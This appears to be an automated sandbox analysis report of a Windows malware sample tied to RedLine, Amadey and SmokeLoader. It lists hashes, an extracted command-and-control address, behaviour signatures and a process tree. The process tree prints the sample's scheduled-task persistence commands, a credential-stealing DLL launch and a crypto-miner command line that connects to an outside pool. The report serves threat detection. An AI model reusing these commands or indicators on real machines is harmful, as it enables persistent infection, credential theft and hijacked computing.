Analysis
-
max time kernel
151s -
max time network
147s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
07-11-2022 02:01
General
-
Target
dba812d730d390e0bb94cd4eda8726a5b4634c706a836184bb45448c610e2b33.exe
-
Size
310KB
-
MD5
b0711fde98fc86bcd420e05b83bb2917
-
SHA1
7934c7f04b9327038a0be3d7055e3e1890eddcfb
-
SHA256
dba812d730d390e0bb94cd4eda8726a5b4634c706a836184bb45448c610e2b33
-
SHA512
ef9257df297a7c00e8016fac4dc091b996489b3b1f7bd6e9667193d0d14225d3ab7865cfbbdac2624a685c6ca8cbc6faa7bb0c22d9b2dd8a6040397fafe8c16a
-
SSDEEP
3072:5pdkSn9ikW+5re1qs2WD/dfGXp4+xJqcu4wIzAVZPOfnlTtXDwB8EN:eSnS0ST2WDcU4PfnlTtXDK5N
Malware Config
Extracted
redline
Google2
167.235.71.14:20469
-
auth_value
fb274d9691235ba015830da570a13578
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect Amadey credential stealer module 2 IoCs
-
Detects Smokeloader packer 1 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 5 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 49 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\dba812d730d390e0bb94cd4eda8726a5b4634c706a836184bb45448c610e2b33.exe"C:\Users\Admin\AppData\Local\Temp\dba812d730d390e0bb94cd4eda8726a5b4634c706a836184bb45448c610e2b33.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\278D.exeC:\Users\Admin\AppData\Local\Temp\278D.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 2402⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\2FDB.exeC:\Users\Admin\AppData\Local\Temp\2FDB.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe"C:\Users\Admin\AppData\Roaming\CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5BAD.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
-
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 65⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3990.exeC:\Users\Admin\AppData\Local\Temp\3990.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe" /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\80b59841e5c623\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- outlook_win_path
-
-
-
C:\Users\Admin\AppData\Local\Temp\58A2.exeC:\Users\Admin\AppData\Local\Temp\58A2.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exeC:\Users\Admin\AppData\Local\Temp\e94c2b28f2\rovwer.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
837KB
MD5b71f097937ef3e6a757cda055babb005
SHA13fb167b8608824592d1707614cce46cfc643dd44
SHA256917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482
SHA512d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa
-
Filesize
837KB
MD5b71f097937ef3e6a757cda055babb005
SHA13fb167b8608824592d1707614cce46cfc643dd44
SHA256917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482
SHA512d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa
-
Filesize
246KB
MD510c578560431cf9b4f5731a6827359d6
SHA17e0e8d9ea145e1f3c5cf32d3616eda8b12bbe681
SHA256fd040cca7202e2b019290b65cf75bef32b55df3b6e979d384a6c20dc33ca41b6
SHA51234ddb7e5b92ec2769f6572595c4d23e06f4f8c3d01d2b26482aecbef5b83ca6c03eb795b4a778d053d104dd0d9070cedd0e820a90f7da52cf9d8c80aa161b74f
-
Filesize
246KB
MD510c578560431cf9b4f5731a6827359d6
SHA17e0e8d9ea145e1f3c5cf32d3616eda8b12bbe681
SHA256fd040cca7202e2b019290b65cf75bef32b55df3b6e979d384a6c20dc33ca41b6
SHA51234ddb7e5b92ec2769f6572595c4d23e06f4f8c3d01d2b26482aecbef5b83ca6c03eb795b4a778d053d104dd0d9070cedd0e820a90f7da52cf9d8c80aa161b74f
-
Filesize
1.1MB
MD5532f80cb0ccfd2fcad21bca6044b2ff7
SHA147d26fb23e4192469fff7693922ef239cea1d5cf
SHA25644673c9ea35c6aa5fcb5481674afe921ae12a2f8f485d38c0ffc0accb0f406de
SHA512d4cc16c884f8ce0792e578ac548d2a3f1fc794bfb83276e8329877bb07067997651405625a4a39993848beea8a46308f2ca6f01ca6b3ca41e9b4c87885e7ebb8
-
Filesize
1.1MB
MD5532f80cb0ccfd2fcad21bca6044b2ff7
SHA147d26fb23e4192469fff7693922ef239cea1d5cf
SHA25644673c9ea35c6aa5fcb5481674afe921ae12a2f8f485d38c0ffc0accb0f406de
SHA512d4cc16c884f8ce0792e578ac548d2a3f1fc794bfb83276e8329877bb07067997651405625a4a39993848beea8a46308f2ca6f01ca6b3ca41e9b4c87885e7ebb8
-
Filesize
348KB
MD5b48f04777e107001b46b4315d3fbcf39
SHA12a4d0f6fbba056ab30604a36168be9be178586eb
SHA2561d53b1c6183f05db5fef2b1f23000c9c93e7c7ecc60f2586254f0342840424d4
SHA51282dc210a02dec6269ebeb519fda06fab2212efa79bc6814eda9b7050351bd992400bc52dc55e735c72617f5248b3fca16c98cdf4e1eb1e19cfb776e3c40aa98a
-
Filesize
348KB
MD5b48f04777e107001b46b4315d3fbcf39
SHA12a4d0f6fbba056ab30604a36168be9be178586eb
SHA2561d53b1c6183f05db5fef2b1f23000c9c93e7c7ecc60f2586254f0342840424d4
SHA51282dc210a02dec6269ebeb519fda06fab2212efa79bc6814eda9b7050351bd992400bc52dc55e735c72617f5248b3fca16c98cdf4e1eb1e19cfb776e3c40aa98a
-
Filesize
3.6MB
MD589f4f74f34189fa664c022a861156740
SHA131d266d0037c1bbd2d980182a47aea164767263b
SHA25652f63e8ae9e11f0a92602d69dce8bfa17908db0ee421932cbbf5222725153154
SHA512d20f76f10b542dd068572b72e00e40e046953353896f7796173b1d9b706cf7bb29d009c869f9318284dfe563ec6aec6a86b434705615d9475d1cf3dd7e71d69c
-
Filesize
3.6MB
MD589f4f74f34189fa664c022a861156740
SHA131d266d0037c1bbd2d980182a47aea164767263b
SHA25652f63e8ae9e11f0a92602d69dce8bfa17908db0ee421932cbbf5222725153154
SHA512d20f76f10b542dd068572b72e00e40e046953353896f7796173b1d9b706cf7bb29d009c869f9318284dfe563ec6aec6a86b434705615d9475d1cf3dd7e71d69c
-
Filesize
348KB
MD5b48f04777e107001b46b4315d3fbcf39
SHA12a4d0f6fbba056ab30604a36168be9be178586eb
SHA2561d53b1c6183f05db5fef2b1f23000c9c93e7c7ecc60f2586254f0342840424d4
SHA51282dc210a02dec6269ebeb519fda06fab2212efa79bc6814eda9b7050351bd992400bc52dc55e735c72617f5248b3fca16c98cdf4e1eb1e19cfb776e3c40aa98a
-
Filesize
348KB
MD5b48f04777e107001b46b4315d3fbcf39
SHA12a4d0f6fbba056ab30604a36168be9be178586eb
SHA2561d53b1c6183f05db5fef2b1f23000c9c93e7c7ecc60f2586254f0342840424d4
SHA51282dc210a02dec6269ebeb519fda06fab2212efa79bc6814eda9b7050351bd992400bc52dc55e735c72617f5248b3fca16c98cdf4e1eb1e19cfb776e3c40aa98a
-
Filesize
348KB
MD5b48f04777e107001b46b4315d3fbcf39
SHA12a4d0f6fbba056ab30604a36168be9be178586eb
SHA2561d53b1c6183f05db5fef2b1f23000c9c93e7c7ecc60f2586254f0342840424d4
SHA51282dc210a02dec6269ebeb519fda06fab2212efa79bc6814eda9b7050351bd992400bc52dc55e735c72617f5248b3fca16c98cdf4e1eb1e19cfb776e3c40aa98a
-
Filesize
153B
MD5e34fa55b8ae100a9a2da30d005254bff
SHA13a4da7baebe883b79b6aacf391e0453ba52efa5a
SHA2563ad5b62106fac7729b64fdf0d9b108cde394905a6acb88eaaf3faaff8190a988
SHA51283834bad9c11c5162bd5b62398faa4fa08b1324382f15078bd597c719423cd4b4217c625d52fd8728dd77b86e63730b63e6f10cae04fa19a53c3bf2f99f2e343
-
Filesize
126KB
MD5522adad0782501491314a78c7f32006b
SHA1e487edceeef3a41e2a8eea1e684bcbc3b39adb97
SHA256351fd9b73fa0cbbdfbce0793ca41544f5191650d79317a34024f3c09f73ac9ba
SHA5125f8a103deea3ed5f8641d1f4c91a4f891a8208b679cadbfac4a068afbad0d2f777cd29ace4bdfec590e722435473e4f8465fb80d5cda792dc0236646580101a7
-
Filesize
837KB
MD5b71f097937ef3e6a757cda055babb005
SHA13fb167b8608824592d1707614cce46cfc643dd44
SHA256917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482
SHA512d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa
-
Filesize
837KB
MD5b71f097937ef3e6a757cda055babb005
SHA13fb167b8608824592d1707614cce46cfc643dd44
SHA256917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482
SHA512d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa
-
Filesize
126KB
MD5522adad0782501491314a78c7f32006b
SHA1e487edceeef3a41e2a8eea1e684bcbc3b39adb97
SHA256351fd9b73fa0cbbdfbce0793ca41544f5191650d79317a34024f3c09f73ac9ba
SHA5125f8a103deea3ed5f8641d1f4c91a4f891a8208b679cadbfac4a068afbad0d2f777cd29ace4bdfec590e722435473e4f8465fb80d5cda792dc0236646580101a7
-
Filesize
7.9MB
-
Filesize
7.9MB
-
Filesize
32KB
-
Filesize
44KB
-
Filesize
32KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
84KB
-
Filesize
36KB
-
Filesize
4.3MB
-
Filesize
4.3MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
256KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
256KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
156KB
-
Filesize
136KB
-
Filesize
856KB
-
Filesize
28KB
-
Filesize
44KB
-
Filesize
28KB
-
Filesize
28KB
-
Filesize
52KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
696KB
-
Filesize
4.4MB
-
Filesize
696KB
-
Filesize
4.4MB
-
Filesize
24KB
-
Filesize
44KB
-
Filesize
24KB
-
Filesize
792KB
-
Filesize
792KB
-
Filesize
48KB
-
Filesize
24KB
-
Filesize
24KB
-
Filesize
20KB
-
Filesize
36KB
-
Filesize
1.1MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
124KB
-
Filesize
4.4MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
4.4MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
248KB
-
Filesize
124KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
248KB
-
Filesize
1.6MB
-
Filesize
408KB
-
Filesize
1.0MB
-
Filesize
6.0MB
-
Filesize
5.0MB
-
Filesize
72KB
-
Filesize
248KB
-
Filesize
300KB
-
Filesize
584KB
-
Filesize
160KB
-
Filesize
36KB
-
Filesize
60KB
-
Filesize
36KB